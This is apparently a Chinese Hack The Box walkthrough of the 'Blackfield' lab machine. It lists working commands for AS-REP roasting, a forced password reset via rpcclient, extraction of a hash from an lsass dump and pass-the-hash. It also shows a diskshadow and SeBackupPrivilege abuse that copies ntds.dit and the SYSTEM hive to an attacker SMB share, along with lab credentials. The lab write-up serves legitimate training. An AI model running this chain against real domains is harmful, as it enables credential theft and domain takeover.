【Hack The Box】windows练习-- Blackfield

news2024/9/22 19:28:53

HTB 学习笔记

【Hack The Box】windows练习-- Blackfield


🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月17日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

  • HTB 学习笔记
    • 信息收集
    • 我看ldap
    • 我看53dns
    • 我看445smb
    • 我看88kerbrute
    • 我进一步分析
    • rpc协助修改密码
    • SeBackupPrivilege
    • 公开卷影复制服务 (VSS)

在这里插入图片描述

信息收集

53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-06-08 02:33:08Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/7%Time=5EDD4080%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h02m00s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-06-08T02:35:25
|_  start_date: N/A

root@kali# nmap -sU -p- --min-rate 10000 -oA scans/nmap-alludp 10.10.10.192
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-07 15:46 EDT
Nmap scan report for 10.10.10.192
Host is up (0.015s latency).
Not shown: 65533 open|filtered ports
PORT    STATE SERVICE
53/udp  open  domain
389/udp open  ldap

我看ldap

获得了如下信息
放入hosts
(Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
ldapsearch -h 10.10.10.192 -x -s base namingcontexts

得到
DomainDnsZones.blackfield.local 和 ForestDnsZones.blackfield.local
这两个要接着dig
没有什么有用信息

我看53dns

dig axfr @10.10.10.192 blackfield.local
dig @10.10.10.192 blackfield.local

我看445smb

在这里插入图片描述

crackmapexec smb 10.10.10.192

smbmap -H 10.129.13.243 -u null
在这里插入图片描述
有很多目录,但都是空的
在这里插入图片描述
但是长得比较像用户名,所以我们
采取挂载到本地而后ls到文本

mount -t cifs //10.10.10.192/profiles$ /mnt
mv users users.old; ls -1 /mnt/ > users

-1是每行只打印一个
在这里插入图片描述

我看88kerbrute

就像在 Forest 中一样,我可以检查此用户列表中是否有 UF_DONT_REQUIRE_PREAUTH标志设置为真。 对于这些用户,请求 Kerberos 票证将生成一个哈希,我可以尝试用蛮力破解该哈希,而无需我在域上拥有任何有价值的用户凭据。

我会用 GetNPUsers.py测试每个用户,因为我知道成功的响应将包含一个哈希 krb5asrep在其中,我会用 grep 来查看任何成功的结果。 它运行了几分钟,但找到了一个结果:

用户名字典就从刚才的那个里面获取

kerbrute userenum --dc 10.10.10.192 -d blackfield users.txt

在这里插入图片描述

impacket-GetNPUsers blackfield/ -no-pass -dc-ip 10.10.10.192 -usersfile valid_users.txt

得到一个hash密码,解密得到密码为

在这里插入图片描述

我进一步分析

得到凭据之后,由于大部分凭据的通用性,所以我们采用要进行密码喷洒来获取更大范围的胜利

crackmapexec winrm 10.10.10.192 -u support -p '#00^BlackKnight'

发现smb可以登陆,所以登录

smbmap -H 10.10.10.192 -u support -p '#00^BlackKnight'

但是发现没啥有价值的

profiles$仍然有相同的目录,都是空的。
NETLOGON完全是空的。
SYSVOL有五个文件,但没有一个文件对我有用。

在这里插入图片描述开启blood环境

neo4j start
Host : http://localhost:7474

远程信息收集器

bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.129.13.243

然后有几个js文件,拖进去就行
在这里插入图片描述把自己有凭据的主机设置为已拥有
在这里插入图片描述然后分析也可以是short环节的一些

在这里插入图片描述
在这里插入图片描述
ForceChangePassword
但是鉴于我们没有shell,所以不能采取常规方法修改autio2020的密码,我们才去rpc的办法

rpc协助修改密码

在这里插入图片描述

rpcclient -U 'blackfield.local/support%#00^BlackKnight' 10.129.13.243 -c 'setuserinfo2 audit2020 23 "0xdf!!!"'

在这里插入图片描述检验一下

crackmapexec smb 10.129.13.243 -u audit2020 -p '0xdf!!!'

在这里插入图片描述smbclient -U audit2020 //10.129.13.243/forensic '0xdf!!!'
接着我们继续把盘子做大
在这里插入图片描述发现了很多压缩包
其中lsass.zip 比较敏感

Mimikatz 首先出现是因为它会从 lsass.exe随着反病毒软件开始流行起来,攻击者开始转向。 一个 众所周知的技术 是使用 procdump.exe从 Sysinternals (并由 Microsoft 签名)转储 lsass.exe然后在攻击者控制的空间中提取该内存转储并从中提取哈希值。

在这里插入图片描述这是在另一个文件夹中发现的txt文件,发现了一个新的用户
Ipwn3dYourCompany
在这里插入图片描述

pypykatz lsa minidump lsass.DMP |more
INFO:root:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
[...]
	== MSV ==
		Username: svc_backup
		Domain: BLACKFIELD
		LM: NA
		NT: 9658d1d1dcd9250115e2205d9f48400d
		SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
9658d1d1dcd9250115e2205d9f48400d
crackmapexec smb 10.129.13.243 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

在这里插入图片描述
在这里插入图片描述

evil-winrm -i 10.129.13.243 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

在这里插入图片描述
在这里插入图片描述

SeBackupPrivilege

net user svc_backup  //查看组确定在Backup Operators
1. 下载模块
upload /root/Desktop/SeBackupPrivilege-master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll
以及
upload /root/Desktop/SeBackupPrivilege-master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll

2. 加载模块
import-module .\SeBackupPrivilegeCmdLets.dll
import-module .\SeBackupPrivilegeUtils.dll

3. 利用(主要copy看不了的一个可以看的备份过来)
Copy-FileSeBackupPrivilege C:\Windows\ntds\ntds.dit .
把ntds.dit copy到这希望能打开

在这里插入图片描述但是我们看不了,因为hash库正在使用,所以将采取别的方法
在这里插入图片描述

公开卷影复制服务 (VSS)

利用这个方法我们可以阅读被锁定的文件,不是密码锁住,而是进程锁住,例如正在运行的程序

用户 svc_backup 是 Backup Operators 组的成员,正如 net users svc_backup输出。

本地管理员组的成员身份或同等身份是运行 Diskshadow 所需的最低要求。 以及Backup Operators 也可以

在这里插入图片描述
域控上存放所有用户的hash库
一般来说直接拿不到,需要公开卷影复制服务 (VSS)
详细步骤如下
所需这个脚本vss.dsh
如果是在kali编辑的可以

最好执行
unix2dos vss.dsh
来更好的为windows执行
1. 写好脚本
-----------------vss.dsh--------------------
set context persistent nowriters
set metadata c:\programdata\df.cab
set verbose on
add volume c: alias df
create
expose %df% z:
---------------------------------------------
2. 上传
upload vss.dsh c:\programdata\vss.dsh
diskshadow /s c:\programdata\vss.dsh

确保所在目录可读可写
3. 建立smb共享,或者你先搞到本地然后传回去也行
4. 传递
Copy-FileSeBackupPrivilege z:\Windows\ntds\ntds.dit \\10.10.14.14\s\ntds.dit
或者直接copy
5. 拿system
reg.exe save hklm\system \\10.10.14.14\system
6. 破解
secretsdump.py -system system -ntds ntds.dit LOCAL

写好之后尝试一下看能不能行,结果可以,
在这里插入图片描述然后就按照上面那一堆操作
到这里开始转储system

在这里插入图片描述全都下载下去
在这里插入图片描述
在这里插入图片描述

然后按照第6步破解而后拿到hash了用啥登陆都行

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/12670.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

[Games 101] Lecture 10 Geometry 1 (Introduction)

Geometry 1 (Introduction) Ways to Represent Geometry 隐式 (Implicit) 几何 只告诉点满足某种约束或关系,并不给出实际的点,也就是说,定义 f(x,y,z)0f(x,y,z) 0 f(x,y,z)0 例如,定义三维空间中的点,满足&#…

上海亚商投顾:信创概念掀涨停潮

上海亚商投顾前言:无惧大盘大跌,解密龙虎榜资金,跟踪一线游资和机构资金动向,识别短期热点和强势个股。 市场情绪指数早盘低开低走,沪指一度跌超1%,失守3100点关口,创业板指盘中跌逾2%&#xff…

软件工程毕业设计 SSM计算机毕设项目合集【源码+论文】

文章目录前言 题目1 : 基于SSM的网上租车系统 <br /> 题目2 : 基于SSM的药品管理系统 <br /> 题目3 : 基于SSM的药源药品商城保健品购物网站 <br /> 题目4 : 基于SSM的疫情防控物业管理系统 <br /> 题目5 : 基于SSM的音乐网站 <br />前言 &…

如何通过更好的文档管理减轻小型企业的压力

如何通过更好的文档管理减轻小型企业的压力 企业如何处理企业文档在很大程度上体现了企业以目前的形式茁壮成长的能力以及在当今的市场中成长为成熟的、有竞争力的实体的能力。 具体来说&#xff0c;在小型企业中&#xff0c;许多员工都需要承担多种职责&#xff0c;每一分钟…

代码随想录58——单调栈:739每日温度、 496下一个更大元素I

文章目录1.739每日温度1.1.题目1.2.解答1.2.1.单调栈使用情况1.2.2.本题解答2. 496下一个更大元素I2.1.题目2.2.解答1.739每日温度 参考&#xff1a;代码随想录&#xff0c;739每日温度&#xff1b;力扣题目链接 1.1.题目 1.2.解答 1.2.1.单调栈使用情况 首先想到的当然是暴…

通过STM32Cube配置完成基于I2C协议的AHT20温湿度传感器的数据采集

文章目录前言一、I2C协议1、应用2、组成3、软件I2C和硬件I2C3.1软件I2C3.2硬件I2C二、通过硬件I2C协议采集AHT20的数据1、配置项目2、配置代码三、效果四、总结五、参考资料前言 硬件&#xff1a;stm32f103c8t6 核心板软件&#xff1a;STM32CubeMX 6.4.0软件&#xff1a;keil5…

java常见集合框架的区别

1.说说有哪些常见集合&#xff1f; 集合相关类和接口都在java.util中&#xff0c;主要分为3种&#xff1a;List&#xff08;列表&#xff09;、Map&#xff08;映射&#xff09;、Set(集)。 Java集合主要关系 其中Collection是集合List、Set的父接口&#xff0c;它主要有两个子…

澳大利亚博士后招聘|国立大学—太阳能电池方向

【国外博士后招聘-知识人网】澳大利亚国立大学博士后—太阳能电池方向 澳大利亚国立大学&#xff08;The Australian National University&#xff09;&#xff0c;简称ANU&#xff0c;始建于1946年&#xff0c;坐落于澳大利亚首都堪培拉&#xff0c;是公立研究型综合类大学&am…

Ernie-SimCSE对比学习在内容反作弊上应用

作者 | ANTI 导读 AI技术在不同行业和业务被广泛的应用&#xff0c;本文介绍了反作弊团队在与spammer对抗愈演愈烈的趋势下&#xff0c;不断探索前沿技术&#xff0c;将百度NLP预训练模型结合对比学习用于解决spam内容中知道提问群发推广作弊的技术方案。 本次分享&#xff0c;…

从单车智能到车路协同,均胜电子正在加快智能驾驶商业化进程

进入2022年&#xff0c;自动驾驶迈入了商业化的关键期&#xff0c;但市场分层也开始越来越明显。 一方面&#xff0c;L2级及以上智能辅助驾驶的搭载量在不断攀升&#xff0c;未来将成为量产车的标准配置。根据《高工智能汽车研究院》数据显示&#xff0c;今年1-9月前装标配搭载…

基于python的停车场管理系统的设计与实现/智能停车管理系统

摘要 车位信息是停车场供应用户必不可少的一个部分。在停车场发展的整个过程中&#xff0c;车位信息担负着最重要的角色。为满足如今日益复杂的管理需求&#xff0c;各类系统管理程序也在不断改进。本课题所设计的停车场管理系统&#xff0c;使用Django框架&#xff0c;Python语…

Linux学习-37-查看文件系统硬盘信息(df、du命令)

10.2 df用法详解&#xff1a;查看文件系统硬盘使用情况 Linux 磁盘管理好坏直接关系到整个系统的性能问题。df &#xff08;disk free&#xff09;命令&#xff0c;检查文件系统的磁盘空间占用情况&#xff0c;包括文件系统所在硬盘分区的总容量、已使用的容量、剩余容量等。 …

[附源码]Python计算机毕业设计bugbase管理系统

项目运行 环境配置&#xff1a; Pychram社区版 python3.7.7 Mysql5.7 HBuilderXlist pipNavicat11Djangonodejs。 项目技术&#xff1a; django python Vue 等等组成&#xff0c;B/S模式 pychram管理等等。 环境需要 1.运行环境&#xff1a;最好是python3.7.7&#xff0c;…

Div3 cf1741

Cf1741 文章目录A. Compare T-Shirt SizesB. Funny Permutation&#xff08;思维&#xff09;C. Minimize the Thickness&#xff08;&#xff09;A. Compare T-Shirt Sizes 题意: 第一行&#xff0c;输入测试样例个数n&#xff0c;接下来n行输入 &#xff0c;输入a和b代表衣服…

【自然语言处理(NLP)】基于注意力机制的英文新闻标题生成

【自然语言处理&#xff08;NLP&#xff09;】基于注意力机制的英文新闻标题生成 作者简介&#xff1a;在校大学生一枚&#xff0c;华为云享专家&#xff0c;阿里云专家博主&#xff0c;腾云先锋&#xff08;TDP&#xff09;成员&#xff0c;云曦智划项目总负责人&#xff0c;全…

SpringBoot+Vue项目宠物猫店管理系统的设计与实现

文末获取源码 开发语言&#xff1a;Java 使用框架&#xff1a;spring boot 前端技术&#xff1a;JavaScript、Vue 、css3 开发工具&#xff1a;IDEA/MyEclipse/Eclipse、Visual Studio Code 数据库&#xff1a;MySQL 5.7/8.0 数据库管理工具&#xff1a;phpstudy/Navicat JDK版…

[附源码]java毕业设计篮球俱乐部管理系统

项目运行 环境配置&#xff1a; Jdk1.8 Tomcat7.0 Mysql HBuilderX&#xff08;Webstorm也行&#xff09; Eclispe&#xff08;IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持&#xff09;。 项目技术&#xff1a; SSM mybatis Maven Vue 等等组成&#xff0c;B/S模式 M…

Flume部署实验

目录一、实验介绍1.1实验内容1.2实验知识点1.3实验环境1.4实验资源1.5实验步骤清单二、实训架构三、实验环境准备四、实验步骤4.1Flume部署4.1.1配置hosts文件及zookeeper的myid4.1.2安装Flume4.1.3验证Flume五、实验总结一、实验介绍 1.1实验内容 本实验包括分布式海量日志采…

Axure 学习:简单的下拉菜单为什么做不好?

​很多同学在学习axure的时候&#xff0c;总是会发现有的时候明明看起来很简单的内容&#xff0c;却怎么也做不好&#xff0c;总是会出现这样或那样的问题。 原因是细节。有的同学没有注意到细节&#xff0c;忽略了&#xff0c;造成做好的内容总是存在一些小问题。本文以一个交…

【FLASH存储器系列十】ONFI数据接口的时序参数与时序图

目录 1.1 时序参数 1.2 时序图详解 1.2.1命令锁存时序 1.2.2地址锁存时序 1.2.3数据输入时序 1.2.4数据输出时序 1.2.5数据输出时序&#xff08;EDO&#xff09; 1.2.6读状态时序 1.1 时序参数 ONFI协议中明确规定了时序参数的范围&#xff0c;如果不满足要求的最小和最…